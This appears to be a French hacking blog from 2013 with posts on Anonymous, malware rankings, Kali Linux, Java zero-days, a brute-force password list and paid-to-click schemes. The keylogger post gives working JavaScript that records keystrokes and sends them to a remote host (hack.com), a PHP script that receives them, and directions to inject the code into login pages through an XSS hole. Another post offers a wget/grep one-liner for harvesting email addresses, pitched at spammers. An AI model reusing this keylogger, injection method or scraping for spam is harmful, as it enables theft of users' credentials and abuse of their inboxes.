Anonoups

20 mars 2013

Je suis plus que chaud pour le VPN

Classé sous Informations sur un sujet — Anonoups @ 16 h 10 min

Alors je vais pas y aller pas 4 chemins :

Qui souhaiterait participer à la création d’un VPN ?

Sachant que :

  1. Je « fais équipe avec » Ghom ou Newsuiveurdeceblog (plus tellement New, old serait plus approprié ^^)
  2. Il faut être un minimum malin (donc pas cruche hein !)
  3. Ceci va être un travail long et laborieux donc si vous vous présentez et que vous abandonnez 1 mois après c’est pas la peine
  4. J’espère que vous serez nombreux à vouloir participer, sinon ce sera un gros FAIL

Si vous vous joigniez au projet, il faudra respecter ces règles :

  1. Ne pas faire son radin et partager les informations
  2. Être solidaire (je ne veux pas de kikoos), et poli (pas d’insultes, ou de fight en live, merci bien mais je m’en passerai).
  3. Merci de veiller à ce que les informations que vous trouverez soient mises sur ce pad. Vous pourez aussi me joindre sur TeamViewer ou RetroShare en me filant vos coordonnées.             

Si vous respectez ces règles à la lettre, il n’y aura pas de conflits.

Une entrave à ce règlement provoquera l’exclusion de conflit. Si persistance il y a, obligé d’intervenir je serai.

Sur ce je vous dis à bientôt.

Cordialement, Anonoups

 

Anonymous rend public les 33GB de données du JSTOR en mémoire d’Aaron Swartz

Classé sous Les Anonymous : Une Histoire. Un Groupe. Un Collectif. — Anonoups @ 13 h 46 min

Anonymous_arronAprès le suicide d’Aaron Swartz, l’un des pères du RSS et co-fondateur de Reddit, Anonymous ont décidé de rendre public sur les réseaux P2P, les 33 GB de documents que Aaron avait piraté au MIT via leur service payant JSTOR.

Pour ce vol, Aaron encourait une peine d’emprisonnement pouvant atteindre 35 ans et une amende s’élevant jusqu’à 1 million de dollars.

La nouvelle vient par l’intermédiaire du compte Twitter Tylersec

Anonymous & TylerSec Statement | http://pastebin.com/kVYSHbe1  |

Voci le message que les Anonymous ont laisser sur le site pastbin:

 

HIS NAME IS Aaron Swartz and he is twenty-six years old. His name is Aaron Swartz, and Aaron Swartz will be twenty-six years old forever because you killed him.
HIS NAME IS Aaron Swartz. He is twenty-six years old,and he was part of the fight for internet freedom against people like you.
HIS NAME IS Aaron Swartz. He is twenty-six years old, and you wanted to use him to prove that the state always wins and that resistance is futile.
HIS NAME IS Aaron Swartz. He is twenty-six years old, and you wanted to divide us so that we will turn on each other rather than stand up for our rights.
The people you are after are the people that society depends on: we write songs, we create art, we build, we invent, we feel love and laugh, we will defend our freedom to our last breath. Do not fuck with us.

Aujourd’hui, le site du MIT est devenu une cible pour les militants et les activistes, ça devrait leur apprendre une bonne leçon sur la liberté de partage et du futur d’Internet.

Mots-clés : , , , , ,

Les keyloggers: fonctionnement, utilisation et protection

Classé sous Hacking,Piratage/Prise de compte — Anonoups @ 13 h 27 min

business be aware of hacking and crimeUn keylogger est un programme malicieux chargé dans la mémoire de votre ordinateur et qui va récupérer tout ce que vous saisissez au clavier : vos mots de passe, vos informations bancaires, etc… Une personne malveillante peut ensuite y retrouver et exploiter les divers logins et mots de passe de votre ordinateur.

Certains keyloggers sont capables d’enregistrer les URL visitées, les courriers électroniques consultés ou envoyés, les fichiers ouverts, des captures d’écran voire de créer une vidéo retraçant toute l’activité de l’ordinateur.

Dans cet article on va voir comment fonctionne les keyloggers,  comment mettre en place un keylogger écrit en JavaScript et comment s’en protéger.

Le fonctionnement des keyloggers

Un keylogger peut être du matériel ou un logiciel spécifique. Un keylogger matériel est un dispositif qui peut être fixé au clavier, au câble ou au bloc système de l’ordinateur.

keylogger materiel Les keyloggers: fonctionnement, utilisation et protection

Ils sont petits, se branchent entre le port PS2 du PC et le connecteur du clavier.  Ils ne coûtent pas cher, on en trouve en vente partout  et ils sont indétectables par les antivirus. Bref, l’idéal sauf si l’utilisateur regarde souvent derrière son PC pour vérifier.

Un keylogger logiciel est un programme spécialement développé pour suivre les frappes au clavier et transmettre ces informations dans un fichier.

Les keyloggers s’installent :

  • Lors de l’ouverture d’un fichier joint à un message
  • A l’ouverture d’un fichier se trouvant dans un répertoire partagé d’un réseau P2P
  • A l’aide d’un script sur une page Web qui exploite les particularités d’un navigateur permettant au programme d’être exécuté automatiquement dès qu’un utilisateur accède à la page
  • Etc

Ils existent plusieurs techniques pour la construction de keyloggers.Voici les plus populaires:

  • Piège système pour la communication d’une frappe au clavier (installé à l’aide de la fonction WinAPI SetWindowsHook sur les messages envoyés par la procédure de fenêtre (programmé en langage C ou Java) ;
  • Requête cyclique du clavier (à l’aide de la fonction WinAPI Get(Async)KeyState, GetKeyboardState ; programmé le plus souvent en VisualBasic, plus rarement en Borland Delphi)
  • Utilisation d’un filtre pilote (requiert des connaissances spéciales ; programmé en C)

Comment mettre en place un keylogger Javascript ?

J’ai choisi l’utilisation du langage JavaScript pour de multiple raisons.  Ainsi, si l’on découvre une faille XSS dans un site internet , il sera assez facile d’y injecter le bout de code sur une page de login par exemple. On pourra  ainsi collecter l’ensemble des logins/passwords des utilisateurs à leur insu.

Voici un exemple de keylogger écrit en JavaScript :

01 <script language="javascript">
02
03 var keys='';
04 document.onkeypress = function(e) {
05  get = window.event?event:e;
06  key = get.keyCode?get.keyCode:get.charCode;
07  key = String.fromCharCode(key);
08  keys+=key;
09 }
10 window.setInterval(function(){
11  new Image().src = 'http://hack.com/keylogger.php?c='+keys;
12  keys = '';
13 }, 1000);
14 </script>

Ici, le script Javascript récupère tout ce qui est saisi au clavier (fonction onkeypress) dans une variable appelée key. A côté de cela, la fonction setInterval attend une seconde avant de d’envoyer les données vers un serveur distant (serveur pirate).

Sur le serveur distant, on trouvera un script similaire à celui-ci, qui aura pour fonction la réception des données envoyées par le keylogger :

1 <?php
2 if(!empty($_GET['c'])) {
3  $f=fopen("logkey.txt","a+");
4  fwrite($f,$_GET['c']);
5  fclose($f);
6 }
7 ?>

Il vous reste d’injecter le premier script dans un site contenant une faille XSS.

Comment se protéger des keyloggers ?

Les keyloggers sont très dangereux parce que c’est très difficile de les surveiller par un antivirus ou par le gestionnaire des taches.

Cependant, il existe un logiciel gratuit KeyScrambler qui permet de  crypter ce que vous saisissez au clavier directement au niveau du pilote de votre clavier, empêchant ainsi les logiciels malveillants de récupérer vos informations personnelles. Vous bénéficiez ainsi d’une protection à la fois contre les Keyloggers connus et inconnus.

Quand à moi, je vous propose une solution moins pratique mais permettant de contrer la plupart des keyloggers quel que soit leur type (Celà n’est évidement pas infaillible à 100% comme tout les logiciels).
C’est le clavier virtuel de Microsoft !

Il suffit de cliquer sur Démarrer / Exécuter et de taper la commande suivante : osk.exe

Cette application  se comporte exactement comme un clavier sauf que pour écrire vous cliquez sur les touches avec votre souris.

N’utilisez pas Internet Explorer car une faille 0-day à été détectée : elle permet à de saisir les « clics » de souris.

Cordialement, Anonoups

Mots-clés : , , , , ,

15 mars 2013

Les malwares les plus présents sur les ordinateurs et les smartphones

Classé sous Hacking,Informations sur un sujet — Anonoups @ 16 h 18 min

MalwaresLa société Nominium à analysé des milliards de données au travers du DNS pour nous faire un classement des malwares les plus répandus sur les ordinateurs et sur les Smartphones.

Le résultat de cette analyse est impressionnant.  La tendance est à la hausse et la plupart des virus et autres trojans ne sont pas reconnus par les logiciels antivirus, du moins lors de leur première infection.
Pour réaliser cette étude, Nominium s’est basé sur les données transitant par 140 des plus grands fournisseurs d’accès au monde, représentant 30% du trafic mondial et 1000 milliards de requêtes DNS par jour. Ces malwares me sembles familiers. Je les ai utiliser bien souvent.

 

 

Les 10 malwares les plus présents sur les ordinateurs

  • Ngrbot/dorkbot
  • Spybot
  • Ramnit
  • Spambot
  • Palevo/butterfly
  • Virut
  • Zeus
  • Sality
  • Conficker
  • Nitol

Ces données sont intéressantes pour montrer les menaces les plus répandues dans le web. On notera la présence dans ce classement du programme Zeus, un cheval de troie, réputé pour sa simplicité d’utilisation, il permet aux cybercriminels de récupérer très facilement de multiples informations sensibles.
L’étude relève aussi un degré de sophistication toujours plus important avec de plus en plus de « bots » qui déplacent le centre de contrôle et de commande dans le cloud.

Malwares sur les mobiles Android

Concernant les malwares touchant les smartphones Android , le Top 5 est le suivant :

• Notcompatible
• Smspacem
• Lena
• Netisend
• Basebridge

Cette étude confirme la présence toujours active d’anciens malwares comme Smspacem, un malware qui change le fond d’écran du téléphone et envoie un SMS à tous les contacts du téléphone. Il y a aussi Notcompatible, un autre malware, classé en premier position qui mérite toutefois une attention particulière puisqu’il se comporte comme un proxy.

Mots-clés : , , ,

Sortie de Kali Linux, successeur de BackTrack 5

kali_backtrackBonnes nouvelles pour les hackers et les fans de BackTrack, la version 6 est enfin sortie !
Dans ces 7 dernières années, nous avons vu cinq versions impressionnantes de BackTrack Linux. Mais cette fois, pour atteindre des objectifs plus élevés, l’équipe a décidé de quitter backctrak pour faire naître une nouvelle version qui s’appelle kali.

Kali a pris la succession de Backtrack, qui était basé sur Slackware jusqu’à la version 3 puis Ubuntu depuis la version 4.
L’objectif de Kali Linux est de fournir une distribution regroupant l’ensemble des outils nécessaires aux tests de sécurité d’un réseau.

Parmi les nouveautés de la distribution kali, on trouve :

  • Kali Linux est basée sur Debian
  • Tous les packages inclus dans Kali sont supportés par n’importe quelle Debian
  • Les dépôts de kali se synchronisent avec les dépôts officiels de Debian, 4 fois par jour afin que la distribution soit toujours à jour.
  • Vous pouvez facilement créer vos propres personnalisations de Kali pour disposer d’une ISO qui correspond au mieux à vos besoins.
  • Kali Linux fonctionne maintenant sur des architectures ARM comme les Chromebooks de Samsung.

kali Sortie de Kali Linux, le successeur de Backtrack 6

Vous pouvez télécharger Kali Linux sur leur nouveau site tout beau. Une fois de plus, pour pouvoir vous connecter, entez le login « root » est le mot de passe « toor ».

Happy Hacking icon wink Sortie de Kali Linux, le successeur de Backtrack 6

Mots-clés : , , , , , , , ,

14 mars 2013

Coup dur pour Java : 3 Failles découvertes depuis Janvier

Classé sous Informations sur un sujet — Anonoups @ 15 h 55 min

Bonjour à tous. Aujourd’hui je vais vous présenter un article regroupant les nouvelles failles de Java.

Java_failleUne première faille extrêmement critique qui n’est pas encore corrigée. Et qui permet à une personne mal intentionnée de prendre le contrôle total de l’ordinateur d’une victime.

En effet, lorsque vous visitez une site infecté, cette faille autoriserait l’installation d’un code arbitraire avec l’aide d’un Applet Java intégré dans une page Web par exemple.

L’exploit est à présent intégré dans le framework Metasploit, le rendant disponible pour des tests internes. Les autres kits de piratage, en plus de Blackhole, qui intègrent cet exploit sont Nuclear et RedKit

Le créateur de Blackhole, qui utilise le surnom de « panse », a annoncé hier sur plusieurs forums que la faille Java zero-day était «un cadeau du Nouvel An » aux clients qui utilisent son kit d’exploit.

Voici une vidéo qui montre comment exploiter la faille 0-day java avec Metasploit sous Windows 8 :

Image de prévisualisation YouTube

Puisqu’il n’y a pas de patch disponible, je vous recommande de désactiver le plugin Java sur votre navigateur.

 

La société polonaise Security Exploration a expliqué sur son blog la découverte de ces vulnérabilités, ainsi qu’un proof of concept.

L’alerte a été donnée par Adam Gowdiak, le CEO et fondateur de Security Explorations sur la liste du Bugtrack. « Nous avons découvert deux nouvelles failles de sécurité (référencées 54 et 55), qui, une fois combinés, peuvent être utilisés pour contourner la sandbox intégrée dans la mise à jour 15 de Java SE 7 (1.7.0_15-b03).», assure-t-il.

« Sans aller plus dans les détails, tout indique que la balle est dans le camp d’Oracle. Encore une fois », ajoute-t-il.

Oracle a corriger deux faille zero day en urgence cette année. Ces vulnérabilités ont déjà fait des dégâts.  Facebook, Microsoft et Apple ont été victime de ces failles.

Le meilleur que vous pouvez faire maintenant est d’arrêter d’utiliser le plugin java pendant quelques temps en attendant le correctif de sécurité d’Oracle.

Mots-clés : ,

Une grande collection des mots de passe pour l’attaque par force brute

Classé sous Piratage/Prise de compte — Anonoups @ 15 h 07 min

brute_forcesLe hacker Stun vient de publier l’une des plus grande collection de mot de passe pour faire des attaques par force brute. Une liste qui contient 1,493,677,780 mot de passes essentiellement destinés à être utilisés avec des logiciel de crack tels que Hashcat, Cain, John the Ripper et autres utilitaires de récupération de mot de passe.

Cette liste contient toutes les mots des dictionnaires, et les mots de passe des bases de données piratées de ces dernières années. Elle contient également tous les mots qui se trouvent dans la base de données Wikipedia (pages-articles de tous les langues) ainsi que dans de nombreux livres diffusés sur le site du projet Gutenberg.

La liste de Stun est en format fichier texte triés par ordre alphabétique. Les lignes sont séparées par un retour à la ligne « n » caractère. Une fois décompressée pèse pas moins de 15 GB (et 4,2 GB compressés ).

brute force Une grande collection des mots de passe pour lattaque par force brute

Vous pouvez télécharger la liste de mots de passe  de Stun à partir du torrent.

Faites bon usage et assurez-vous localement que  vos mots de passe n’y sont pas dans cette liste.

Source

Mots-clés : , , , , , , , , ,

22 février 2013

Argent Facile

Classé sous Informations sur un sujet — Anonoups @ 12 h 12 min
Bonjours à tous, je vais vous montrer aujourd’hui comment gagner de l’argent facilement et gratuitement à l’aide d’internet (sachez que je ne pourrai être tenu responsable de  vos actes)
  • Les risques

Bien que cette méthode soit relativement facile, et que WOT indique que tous les sites de Paid-To-Cick que je vais vous présenter son fiables, je ne saurai dire si c’est réellement légal. Et, en tant que « h4ck3ur », quand c’est simple, c’est pas bon (et quand c’est roumain, c’est clandestin! ^^). Ensuite, le scénario du jeune con oserait essayer de pirater ma carte bleu (eh oui, « oserait essayer » ! Quoi ça t’dérange ?) n’est pas exclu, et l’éventualité que le PC de ce jeune con finisse en miettes n’est pas écratée non plus.

  • Utilisation

Avant tout, laissez-moi briser vos rêves de devenir millionnaires. Ensuite, IL FAUT AVOIR UN COMPTE PAYPAL POUR TRANSFERER L’ARGENT.

LINKBUCKS
Linkbucks est un site qui converti les liens et les rend « rénumérables », chaque fois que quelq’un clic dessus vous gagnez de l’argent.

http://www.linkbucks.com/

Bon ça peut paraitre long mais si vous avez un blog qui a beaucoup d’audience où plein d’amis facebook (vous pouvez envoyer les liens) ca va vite ^^
Vous serez surement tenté d’utiliser un autoclic, (programme qui clic sur les lien tous seul). JE VOUS LE DECONSEIL FORTEMENT car ceci pourrait-être pris comme du détournement de clic, et donc technique illégale.
GOLD BARRE
Gagnez de l’argent en Surfant !
Qu’est-ce que Gold-Barre ? Gold-Barre est un logiciel publicitaire que vous pouvez voir ci-dessous. Ce logiciel vous permet de visionner automatiquement des publicités. Vous n’avez rien à faire, mis à part lancer le logiciel ! Chaque publicité vue, vous rapporte des points qui sont ensuite convertis en €uros. Vous recevez votre argent une fois atteint 15€ de gains.
Tutorial :
 Image de prévisualisation YouTube
Pour vous inscrire, cliquez sur le lien ci-dessous. Pour éviter tout malentendu, je signale que ce lien mène à une page d’inscription parrainée par moi. Donc je vous demande de bien vouloir cliquer ici même si  vous ne souhaitez pas vous inscrire. Vous pouvez envoyer les liens de vos bannières pour que j’y aille et en même temps vous faire gagner des golds.

gold-barre.com

Ce que j’aime sur celui ci, c’est qu’il y a rien a faire. xD
Smartbarre
 
Exactement le même principe que Gold barre (Lancer les deux barre en même temps = deux fois plus d’argent)
Argent Facile dans Informations sur un sujet banniere
Neobux
 
NeoBux est un PTC à paiement instantané. Dès que vous atteignez le seuil de paiement (2$) vous pouvez demander un paiement sur PayPal ou AlertPay. Vous êtes payé dans la seconde qui suit. plusieurs moyen de gagner de l’argent AdPrize et ADS
approuver par netbusiness-team
NeoBux en chiffres*Valeur moyenne d’un clic : 0,001 $ — 0.015$ ou plus , il ya aussi le AdPrize qui permet de visionner des pub et d’avoir une chance remporter de l’argent jusqu’à 50$ ( moi j’ai déjà gagner une dizaine de fois mais de petite somme entre 0.250$ a 1$ )Détail :*Nombre de clic quotidien : 15 à illimité
*Parrainage : 50% filleuls directs / filleuls loués 500%
*Langue : Anglais français
*Nombres de membres : Plus de 200 000 membres !
*gain par jour : sans filleuls jusqu’à 0,150 $ avec 5 filleuls louer jusqu’à 0.500 $
*Seuil de paiement (payout) : 2 $
*Moyens de paiement : PayPal / AlertPay / NETELLER
*Délai de paiement : Paiement instantané !
http://www.neobux.com/
Mots-clés : , , , , , , , ,

3 février 2013

Mega offre 10 000 euros à qui hackera son système de sécurité

Classé sous Hacking,Informations sur un sujet — Anonoups @ 10 h 20 min

mega_hacker_recompanse

Un peu moins de quinze jours après son lancement, Kim Dotcom, le fondateur de « Mega » offre une prime de 10.000 euros à qui parviendrait à attaquer son système de sécurité.

Une opération qui a pour but de repérer les failles du système pour ensuite les corriger. Mega a en effet été attaqué pour son manque de sécurité, notamment au niveau de ses clés de cryptage.
Mega avait répondu aux critiques dans un long article de blog mais, visiblement agacé, Kim Dotcom a décidé d’offrir 10 000 euros à quiconque cassera la sécurité du site. Dans le billet du blog on pouvait aussi lire que « (…) si vous pouvez casser le SSL de Mega, vous pouvez casser de nombreuses autres choses bien plus intéressantes que Mega ».

Mots-clés : , , , , , , , ,

23 janvier 2013

Extraire des adresses mail d’une page web

Classé sous Hacking,Informations sur un sujet — Anonoups @ 12 h 16 min

extraire-emailAujourd’hui, je vous montre une astuce simple qui vous permet d’extraire des adresses emails d’une page web sous linux et windows.

Très utile pour les spammeurs qui n’aurons aucun mal à trouver les adresses email de leurs futures victimes.

Sous linux, il faudra utiliser la syntaxe suivante, dans un terminal en root :

wget -q -O – http://monsite.com | grep -oe ‘\w*.\w*@\w*.\w*.\w\+’ | sort -u

Voici un exemple d’utilisation :

wget -q -O – http://www.funinformatique.com/Annonceurs | grep -oe ‘\w*.\w*@\w*.\w*.\w\+’ | sort -u

pseudo@gmail.com
contact@funinformatique.com

 

Sous Windows, il existe le logiciel Easy Mail Extractor avec une interface plutôt agréable, qui permet de  récupérer toutes les adresses emails d’une page Internet, d’exclure des emails contenant certains mots et d’autres fonctionalité intéressante.

Télécharger Easy Mail Extractor

 Extraire les adresses email d’une page web

Mots-clés : , , , , , , , , , , , , ,
12345...12

Supervision - Logiciel de s... |
Atelierinformatiqueducaap |
Ihack4u |
Unblog.fr | Créer un blog | Annuaire | Signaler un abus | Hautterapowerlevel
| Achatterapowerlevel
| Terapowerlevel2012